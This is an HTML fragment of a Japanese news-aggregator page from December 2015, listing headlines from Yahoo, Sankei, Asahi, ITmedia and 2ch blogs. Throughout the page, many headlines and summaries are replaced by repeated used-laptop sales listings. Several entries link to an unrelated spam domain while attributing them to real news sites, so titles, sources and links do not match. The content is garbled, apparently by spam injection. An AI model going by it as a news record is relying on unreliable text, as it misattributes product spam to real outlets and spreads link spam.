onclick="document.getElementById('submitButton').click();"></div> <input type="submit" style="display:none;" id="submitButton" /> </form> </div><!--end header_inner--> </div><!--end header--> <div id="menu_bar" class="menu_bar"> <div id="menu_bar_inner" class="menu_bar_inner"><ul><li><a href="" class="selected">トップ</a></li><li><a href="">速報</a></li><li><a href="">★テンキー付きキーボードが便利なハイスペックノート★ 富士通 BIBLO FMV-NF75Y/D 4GBメモリ Core2Duo DVDマルチ 無線LAN Windows7 新品マウス MicrosoftOffice2010 【中古】</a></li><li><a href="">政治経済</a></li><li><a href="">★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 </a></li><li><a href="">スポーツ</a></li><li><a href="">IT</a></li><li><a href="">海外</a></li><li><a href="">科学</a></li><li><a href="">APPLE A1407 Thunderbolt Display 27インチ【中古品】6287</a></li><li><a href="">動画</a></li><li><a href="">★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 </a></li><li><a href="">ネタ</a></li><li><a href="">すべて</a></li></ul></div> </div><!-- /menu_bar --> <div id="fixed_header" class="menu_bar" style="margin-top:-240px;"> <div id="fixed_header_inner" class="menu_bar_inner"> <a href="/"><img src="../img/logo.png" width="92px" height="27px" /></a> </div> </div> <div id="field"> <div id="field_inner"> <div id="main_column"> <div id="main_column_inner"><div id="pan"></div><a name="area_1"></a> <div class="item_list_box " id="area_1"> <div class="list_title"> <div class="controler"></div> <h2><a href="">ニュース総合</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over500">528<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="">★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 ,中古パソコン ★クアッドコアCPU Xeon搭載★ hp Compaq Z400 4GBDDR3メモリ Xeon W3520クアッドコア FX570 500GBHDD DVDマルチ WindowsVista 中古デスクトップ 【MicrosoftOffice付(2003)】 【中古】,★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 ,中古パソコン ★ThinkPadワイドノート★ IBM ThinkPad Z60m 1GBメモリ DVD鑑賞OK 無線LAN リカバリ内蔵 WindowsXP 中古パソコン 【KingosftOffice付(2013)】 【中古】</a></div> <div class="thumbnail"><a class="trimming imgbox" href="http://ceron.jp/url/headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" style="width:120px;height:120px;"><img src="http://img.ceron.jp/db592e52fb3695e73bb88902c6c90a5b239cd30b.jpg" width="120" height="120" onerror="this.parentNode.style.display='none'" style="left:0px" /></a></div><p>★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 ,中古パソコン ★デュアルコア搭載 VAIOスリムノート★ SONY VAIO VGN-FE92S 2GBメモリ Core2Duo 無線LAN対応 Windows7 中古ノートパソコン 【MicrosoftOffice付(2003)】 【中古】,★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 ,★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 ,中古ノートパソコン 東芝 dynabook R634 K PR634KAA637AD71 Core i5 4300U 1.90GHz 4GB SSD-128GB【中古品】8365</span>...[<a href="http://headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 70 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">398<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00000062-san-sctch" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020411088m08lw.html">http://factory.aedew.com/images/Core2Duo/020411088m08lw.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 55 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">198<span>コメント</span></span> <span class="date date_new">5 時間前  </span> <a href="http://www.yomiuri.co.jp/national/20151226-OYT1T50002.html" target="_blank" class="item_direct"> - www.yomiuri.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410406o81tf.html">http://factory.aedew.com/images/Core2Duo/020410406o81tf.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 36 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">194<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://www.sankei.com/life/news/151226/lif1512260005-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 ,★美品ノートがちょっと訳ありで格安★ DELL Inspiron15 3521 2GBDDR3メモリ デュアルコア搭載 DVDマルチ 無線LAN HDMI 15.6型光沢ワイド液晶 Windows7 【中古】,★3DゲームもOK クアッドコア搭載ハイエンドPC★ DELL OptiPlex 755MT 4GBメモリ Core2Quad HD4650 DVDマルチ 22型ワイド液晶 Windows7 【MicrosoftOffice2010】 【中古】</a></div> </div> <span class='debug' style='display:none;'><!--score: 30 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">191<span>コメント</span></span> <span class="date date_new">3 時間前  </span> <a href="http://www.asahi.com/articles/ASHDT662ZHDTTPJB01B.html" target="_blank" class="item_direct"> - www.asahi.com</a></div> <div class="item_title"><a href="">★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 ,中古パソコン ★オシャレな高性能一体型パソコン★ hp Compaq 6000Pro All-in-One 2GBDDR3メモリ Core2Duo 21型フルHD液晶 リカバリ内蔵 Windows7Pro【MicrosoftOffice付(2003)】 【中古】</a></div> </div> <span class='debug' style='display:none;'><!--score: 29 --></span> <div class="more"><a href="http://www.yomiuri.co.jp/latestnews/?from=ygnav2">ニュース総合 をもっと見る</a></div> </div> <a name="area_2"></a> <div class="item_list_box " id="area_2"> <div class="list_title"> <div class="controler"></div> <h2><a href="http://factory.aedew.com/images/Core2Duo/020410581l12ft.html">http://factory.aedew.com/images/Core2Duo/020410581l12ft.html</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over100">146<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://www.sankei.com/politics/news/151226/plt1512260001-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">【岸田外相訪韓】元慰安婦支援で日韓“折半”出資案が浮上 韓国の蒸し返しを封じる狙い(1/2ページ) - 産経ニュース</a></div> <div class="thumbnail"><a class="trimming imgbox" href="http://ceron.jp/url/www.sankei.com/politics/news/151226/plt1512260001-n1.html" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3d712f4a9f0d5a17af803c20b36a4d9d8bec0ea2.jpg" width="120" height="170" onerror="this.parentNode.style.display='none'" style="left:0px" /></a></div><p>★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 ,中古パソコン ★ゲームもOK 大画面液晶セット★ DELL Vostro 410T 4GBメモリ Core2Quad HD3650 HDMI Windows7【MicrosoftOffice付(2007)】 【中古】,★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 ,★ワイド液晶搭載 人気のWin7ノート★hp Compaq 6710b 2GBメモリ Core2Duo搭載 DVD鑑賞OK 無線LAN 15.4型ワイド液晶 Windows7 【EIOffice】 【中古】,★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 ,★DVD焼きOK!!富士通デスクトップが激安★ 富士通 FMV-D5250 1GBメモリ DVDマルチ デスクトップ本体 WindowsXP マイクロソフト?オフィスXP 【中古デスクトップ】 【中古】</span>...[<a href="http://www.sankei.com/politics/news/151226/plt1512260001-n1.html" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 27 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">69<span>コメント</span></span> <span class="date date_new">7 時間前  </span> <a href="http://www.sankei.com/politics/news/151226/plt1512260002-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">【辺野古移設問題】活動家を初の起訴 シュワブ前で機動隊員を蹴る 反対派の活動実態を解明へ(1/2ページ) - 産経ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 16 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">129<span>コメント</span></span> <span class="date date_new">9 時間前  </span> <a href="http://www.yomiuri.co.jp/world/20151225-OYT1T50134.html" target="_blank" class="item_direct"> - www.yomiuri.co.jp</a></div> <div class="item_title"><a href="">★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 ,中古パソコン ★Corei5搭載モバイルノート 訳あり★ hp Compaq EliteBook 8440p 4GBDDR3メモリ Corei5 無線LAN DVDマルチ 14型ワイド Windows7Pro 中古ノートパソコン 【MicrosoftOffice付(XP)】 【中古】</a></div> </div> <span class='debug' style='display:none;'><!--score: 13.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">129<span>コメント</span></span> <span class="date date_new">9 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151225-00050134-yom-int" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="/url/headlines.yahoo.co.jp/hl?a=20151225-00050134-yom-int">ソウル日本大使館前の少女像、韓国が移転を検討 (読売新聞) - Yahoo!ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 13 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">86<span>コメント</span></span> <span class="date date_new">17 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151225-00000001-jct-soci" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020411200e42sw.html">http://factory.aedew.com/images/Core2Duo/020411200e42sw.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 10 --></span> <div class="more"><a href="http://news.yahoo.co.jp/hl?c=bus">政治・経済 をもっと見る</a></div> </div> <a name="area_5"></a> <div class="item_list_box " id="area_5"> <div class="list_title"> <div class="controler"></div> <h2><a href="">IT・テクノロジー</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over20">24<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://pc.watch.impress.co.jp/docs/column/mobiler/20151226_737137.html" target="_blank" class="item_direct"> - pc.watch.impress.co.jp</a></div> <div class="item_title"><a href="">【モバイラーが憧れた名機を今風に蘇らせる】ソニー「バイオノート505エクストリーム」 ~最初にして最後の究極。これぞモバイラーのステータス - PC Watch</a></div> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/d4cd9a68ed5dd7ad42cacbc69a1cf4fe257d279e.jpg" width="160" height="120" onerror="this.parentNode.style.display='none'" style="left:-20px" /></a></div><p>HDDは東芝製の5mm厚の1.8インチタイプ。これもフレキケーブルで接続されている 天板および底面カバーだが、店頭モデルでは「<span>ニッケル強化カーボンモールド」、ソニースタイル専用の直販モデルでは「カーボンファイバー積層板」を採用するとされている。今回入手したのは店頭モデルで、前者を採用している。“ニッケル強化カーボンモ</span>...[<a href="http://pc.watch.impress.co.jp/docs/column/mobiler/20151226_737137.html" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 4 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">15<span>コメント</span></span> <span class="date date_new">1 時間前  </span> <a href="http://akiba-pc.watch.impress.co.jp/docs/news/news/20151226_737187.html" target="_blank" class="item_direct"> - akiba-pc.watch.impress.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020411069c42fv.html">http://factory.aedew.com/images/Core2Duo/020411069c42fv.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">97<span>コメント</span></span> <span class="date date_new">22 時間前  </span> <a href="http://www.itmedia.co.jp/news/articles/1512/25/news108.html" target="_blank" class="item_direct"> - www.itmedia.co.jp</a></div> <div class="item_title"><a href="">★このサイズでDVDが焼ける! 大人気モバイル★東芝 dynabook SS RX2 2GBDDR3メモリ DVDマルチ Core2Duo 無線LAN リカバリ内蔵 Windows7Pro 【EIOffice】 【中古】</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">88<span>コメント</span></span> <span class="date date_new">20 時間前  </span> <a href="http://www.itmedia.co.jp/news/articles/1512/25/news130.html" target="_blank" class="item_direct"> - www.itmedia.co.jp</a></div> <div class="item_title"><a href="http://ceron.jp/url/www.itmedia.co.jp/news/articles/1512/25/news130.html">4文字しか使えないコミュニケーションアプリ「Ping」 - ITmedia ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 2.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">13<span>コメント</span></span> <span class="date date_new">13 時間前  </span> <a href="http://akiba-pc.watch.impress.co.jp/docs/wakiba/find/20151225_737149.html" target="_blank" class="item_direct"> - akiba-pc.watch.impress.co.jp</a></div> <div class="item_title"><a href="">中古パソコン ★人気のThinkPadがお買い得!★ Lenovo ThinkPad R500 2GBメモリ Celeron900 160GBHDD DVD鑑賞OK 15.4型ワイド液晶 Windows7 【MicrosoftOffice付(XP)】 【中古】,★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 </a></div> </div> <span class='debug' style='display:none;'><!--score: 1 --></span> <div class="more"><a href="">IT・テクノロジー をもっと見る</a></div> </div> <a name="area_7"></a> <div class="item_list_box " id="area_7"> <div class="list_title"> <div class="controler"></div> <h2><a href="">科学・学問</a></h2> </div> <div class="item"> <div class="item_status"> <span class="link_num over20">22<span>コメント</span></span> <span class="date date_new">3 時間前  </span> <a href="http://nlab.itmedia.co.jp/nl/articles/1512/26/news025.html" target="_blank" class="item_direct"> - nlab.itmedia.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410382s43ch.html">http://factory.aedew.com/images/Core2Duo/020410382s43ch.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">15<span>コメント</span></span> <span class="date date_new">13 時間前  </span> <a href="http://www.asahi.com/articles/ASHDT7KWMHDTPTIL02V.html" target="_blank" class="item_direct"> - www.asahi.com</a></div> <div class="item_title"><a href="">阪大院教授らの研究費不正経理、2.7億円 大学が発表:朝日新聞デジタル</a></div> </div> <span class='debug' style='display:none;'><!--score: 1 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">14<span>コメント</span></span> <span class="date date_new">14 時間前  </span> <a href="http://karapaia.livedoor.biz/archives/52207962.html" target="_blank" class="item_direct"> - karapaia.livedoor.biz</a></div> <div class="item_title"><a href="">★人気のIBM ThinkPad リカバリ内蔵で安心★ IBM ThinkPad R51e 2GBメモリ リカバリ内蔵 WindowsXP マイクロソフト?オフィスXP 【中古ノートパソコン】 【中古】</a></div> </div> <span class='debug' style='display:none;'><!--score: 1 --></span> <div class="more"><a href="">科学・学問 をもっと見る</a></div> </div> <a name="area_9"></a> <div class="item_list_box " id="area_9"> <div class="list_title"> <div class="controler"></div> <h2><a href="">2chまとめ</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over20">27<span>コメント</span></span> <span class="date date_new">7 時間前  </span> <a href="http://alfalfalfa.com/articles/140445.html" target="_blank" class="item_direct"> - alfalfalfa.com</a></div> <div class="item_title"><a href="">書店「Amazonばっかで本買うのやめてや!!」←これ | 2ちゃんねるスレッドまとめブログ - アルファルファモザイク</a></div> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3b61c537fc58f529bf419a5c974cab5d82588790.jpg" width="213" height="120" onerror="this.parentNode.style.display='none'" style="left:-46px" /></a></div><p>14:風吹けば名無し@\(^o^)/2015/12/25(金) 10:07:08.94ID:28CoKVMbaXMAS.net焼<span>肉屋の名前みたい34:風吹けば名無し@\(^o^)/2015/12/25(金) 10:09:31.60ID:uAnL49f+0XMAS.net普通に本屋で買ってるぞ54:風吹けば名無し@\(^o^)/2015/12/25(金) 10</span>...[<a href="" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">18<span>コメント</span></span> <span class="date date_new">2 時間前  </span> <a href="http://blog.esuteru.com/archives/8449829.html" target="_blank" class="item_direct"> - blog.esuteru.com</a></div> <div class="item_title"><a href="">【は?】「『仏滅』『大安』などが書かれたカレンダーを回収します。差別につながるので」 ← 意味不明すぎて理解できないんだが : はちま起稿</a></div> </div> <span class='debug' style='display:none;'><!--score: 4.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">66<span>コメント</span></span> <span class="date date_new">14 時間前  </span> <a href="http://blog.livedoor.jp/dqnplus/archives/1864971.html" target="_blank" class="item_direct"> - blog.livedoor.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410499u18qa.html">http://factory.aedew.com/images/Core2Duo/020410499u18qa.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 4.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">14<span>コメント</span></span> <span class="date date_new">2 時間前  </span> <a href="http://alfalfalfa.com/articles/140453.html" target="_blank" class="item_direct"> - alfalfalfa.com</a></div> <div class="item_title"><a href="">SEALDs「電車で携帯のゲームやるのは知能が低い」 | 2ちゃんねるスレッドまとめブログ - アルファルファモザイク</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">16<span>コメント</span></span> <span class="date date_new">5 時間前  </span> <a href="http://blog.esuteru.com/archives/8449718.html" target="_blank" class="item_direct"> - blog.esuteru.com</a></div> <div class="item_title"><a href="">★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 ,中古パソコン ★クアッドコアCPUで爆速!★DELL Precision T5400 4GBメモリ Xeonクアッドコア X5450 DVDマルチ デュアルモニタ対応 Windows7 中古デスクトップ 【MicrosoftOffice付(2007)】 【中古】</a></div> </div> <span class='debug' style='display:none;'><!--score: 2 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">14<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://blog.livedoor.jp/kinisoku/archives/4554064.html" target="_blank" class="item_direct"> - blog.livedoor.jp</a></div> <div class="item_title"><a href="">【画像】おい!クリスマスだしこの娘と野球拳しないかい:キニ速</a></div> </div> <span class='debug' style='display:none;'><!--score: 2 --></span> <div class="more"><a href="">2chまとめ をもっと見る</a></div> </div> <a name="area_10"></a> <div class="item_list_box " id="area_10"> <div class="list_title"> <div class="controler"></div> <h2><a href="">ネタ・話題・トピック</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over20">90<span>コメント</span></span> <span class="date date_new">15 時間前  </span> <a href="http://togetter.com/li/917078" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="">【速報】クリスマスに新たな山下達郎伝説が生まれた!? 「Gの音が出ない」と開始90分後にライブを中止 - Togetterまとめ</a></div> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/9ff1006fb7b6091ba48b957edf5a63cce85e1079.jpg" width="120" height="159" onerror="this.parentNode.style.display='none'" style="left:0px" /></a></div><p>山下達郎盛岡コンサート、90分やったところでまさかの中止。 本人が喉の調子に納得出来ないとのこと。 来年に無料で再演しにくるとの<span>ことで、伝説に立ち合えたのはラッキーだが、クリスマスイブ聞けなかった。</span>...[<a href="" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 6.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">21<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://nlab.itmedia.co.jp/nl/articles/1512/26/news015.html" target="_blank" class="item_direct"> - nlab.itmedia.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020411102t76oo.html">http://factory.aedew.com/images/Core2Duo/020411102t76oo.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 4 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">15<span>コメント</span></span> <span class="date date_new">3 時間前  </span> <a href="http://togetter.com/li/917238" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410419q85sm.html">http://factory.aedew.com/images/Core2Duo/020410419q85sm.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">80<span>コメント</span></span> <span class="date">2015-12-25 12:31</span> <a href="http://togetter.com/li/916919" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="">中古パソコン ★お手軽一体型パソコンが激安!★ 富士通 ESPRIMO FMV-K5250 1GBメモリ DVD鑑賞OK 液晶一体型 WindowsXP 【MicrosoftOfficeXP】 デスクトップパソコン Office付き 【中古】</a></div> </div> <span class='debug' style='display:none;'><!--score: 2.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">62<span>コメント</span></span> <span class="date">2015-12-25 08:36</span> <a href="http://d.hatena.ne.jp/ikkou2otosata0/touch/20151225/1450992232" target="_blank" class="item_direct"> - d.hatena.ne.jp</a></div> <div class="item_title"><a href="">オッケー、キリスト。ところで、あたしの誕生日の話も聞いとく? - 私の時代は終わった。</a></div> </div> <span class='debug' style='display:none;'><!--score: 2 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">17<span>コメント</span></span> <span class="date date_new">12 時間前  </span> <a href="http://togetter.com/li/917157" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="">★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 ,★東芝コンパクトモバイルが訳ありのため激安★ TOSHIBA dynabook SS M40 2GBメモリ 13.3型ワイド光沢液晶 DVDマルチ Windows7 【MicrosoftOffice2007】 【中古】</a></div> </div> <span class='debug' style='display:none;'><!--score: 1.5 --></span> <div class="more"><a href="">ネタ・話題・トピック をもっと見る</a></div> </div> <script type="text/javascript"> //現在のセッティングを読み込み var setting = "ct:news:5;ct:society:5;ct:entertainment:5;ct:sports:5;ct:itnews:5;ct:international:3;ct:science:3;ct:odekake:3;ct:2ch:6;ct:neta:6;"; var setting_list = new Array(); setting_split = setting.split(";"); for (var i = 0; i < setting_split.length; i++) { if(!setting_split[i]){continue}; if(m = setting_split[i].match(/^([a-z]*):(.*):(d*)$/)){ setting_list[i+1] = new Array(m[1],m[2],m[3]); }else{ setting_list[i+1] = new Array(); } } controler_set(); </script> <!-- 以下カスタム用HTML --> <div id="edit_area_module" style="display:none;"> <div id="edit_area_AREAID" style="display:none;margin-bottom: 1em;"> <div class="list_title" style="text-align:right;font-size:85%;font-weight:100;"> <a href="javascript:void(0);" onclick="area_change_cancel(AREAID)">キャンセル</a> <div class="controler" style="display:none;"></div> </div> <div id="edit_area_inner_AREAID" style="border:8px solid #ccc;padding:3em 15%;font-size:90%;"> <h3>AREAID 番目のエリア</h3> <p>このエリアに表示するニュースを設定します。</p> <div id="edit_area_1_AREAID"> <select id="select_1_AREAID" onchange="edit_area_2(AREAID)" style="margin-top:1em;"> <option value="">▼表示内容を選んでください▼</option> <option value="ct">カテゴリから選ぶ</option> <option value="kw">任意のキーワードを指定する</option> </select> </div> <br /> <div id="edit_area_2ct_AREAID" style="display:none;"> <select id="select_2ct_AREAID"> <option value="">▼カテゴリを選んでください▼</option> <option value="all">すべての記事</option> <option value="news">ニュース総合</option> <option value="society">政治・経済</option> <option value="international">海外ニュース</option> <option value="entertainment">エンタメ</option> <option value="sports">スポーツ</option> <option value="itnews">IT・テクノロジー</option> <option value="science">科学・学問</option> <option value="odekake">おでかけ・イベント</option> <option value="2ch">2chまとめ</option> <option value="neta">ネタ・話題・トピック</option> <option value="movie">動画</option> <option value="other">その他のニュース</option> </select> </div> <div id="edit_area_2kw_AREAID" style="display:none;"> キーワードを入力してください。<input id="select_2kw_AREAID" type="text" value="KEYWORD" size="32" /><br /> <div style="font-size:85%;color:#666;background:#eee;padding:0.5em;margin:0.5em 0;"> 入力したキーワードにヒットするニュースが配信されます。<br /> <b>複数指定</b>「AAA BBB」:スペースで区切るとAAAかつBBBにマッチする記事を配信します。<br /> <b>OR指定</b>「AAA OR BBB」:AAAまたはBBBにマッチする記事を配信します。ORはパイプ(|)も可。<br /> <b>特定のサイトを指定</b>「site:[URL]」:特定のURLにマッチする記事を配信します。<br /> <b>除外指定</b>「-XXX」:マイナスを付けると「XXX」にマッチする記事を除外します。 </div> </div> <div id="edit_area_3num_AREAID" style="display:none;"> 表示する数:<select id="select_3num_AREAID">NUMLIST</select> </div> <br /> <div style="line-height:2.5;"> <input type="button" value=" 決定 " onclick="area_change_save(AREAID)" style="font-size:150%;"/><br /> <input type="button" value="キャンセル" onclick="area_change_cancel(AREAID)" /> <input type="button" value="このエリアを削除" onclick="area_delete(AREAID)" /> <input type="button" value="この下にエリアを追加" onclick="area_add(AREAID)" /> <br /> <input type="button" value="1つ上へ移動" onclick="area_move(AREAID,-1)" /> <input type="button" value="1つ下へ移動" onclick="area_move(AREAID,1)" /> </div> </div> </div> </div> <!-- カスタム用HTMLここまで --> <div id="top_guidance"> </div><div class='pagenavi'><a href=''>全カテゴリ横断</a> <a href=''>昨日のランキング</a> </div><script type="text/javascript">footerbox_ad();</script></div> </div> <div id="side_column"> <div id="side_column_inner"> <div id="sidefollow"> <script type="text/javascript">sidebox_ad1()</script> <div id="side_flash" style="margin-bottom:4px;"> <div class="list_title"><h2><a href="">速報</a></h2></div> <div class="item_list_box"><div class="item"> <div class="item_status"> <span class="link_num over20">21<span>コメント</span></span> <span class="date date_new">42 分前   </span> <a href="http://news.line.me/list/886887b5/63a4858e236b" target="_blank" class="item_direct"> - news.line.me</a></div> <div class="item_title"><a href="">2016年新ヒーロー戦隊は「動物戦隊ジュウオウジャー」 - LINE NEWS</a></div> </div> <div class="item"> <div class="item_status"> <span class="link_num over3">11<span>コメント</span></span> <span class="date date_new">42 分前   </span> <a href="http://news.line.me/list/886887b5/eee8981f1889" target="_blank" class="item_direct"> - news.line.me</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020411030p88xy.html">http://factory.aedew.com/images/Core2Duo/020411030p88xy.html</a></div> </div> <div id="side_imgs" style="margin-bottom:4px;"> <div class="list_title"><h2><a href="">画像で見る主要ニュース</a></h2></div> <div class="item_list_box"><div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/db592e52fb3695e73bb88902c6c90a5b239cd30b.jpg" width="120" height="120" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over500">506<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="">大安・仏滅…記載は不適切、県がカレンダー回収 (読売新聞) - Yahoo!ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 67 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/770aec9bed626d0714c63dd827bad4f4c20876b2.jpg" width="120" height="172" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over100">387<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00000062-san-sctch" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020411008p22mq.html">http://factory.aedew.com/images/Core2Duo/020411008p22mq.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 28 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/f2a5b22bc8e16c4289aaf7767c8ef71cce9c4104.jpg" width="120" height="129" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over100">134<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00000004-nksports-socc" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="">柿谷曜一朗C大阪復帰 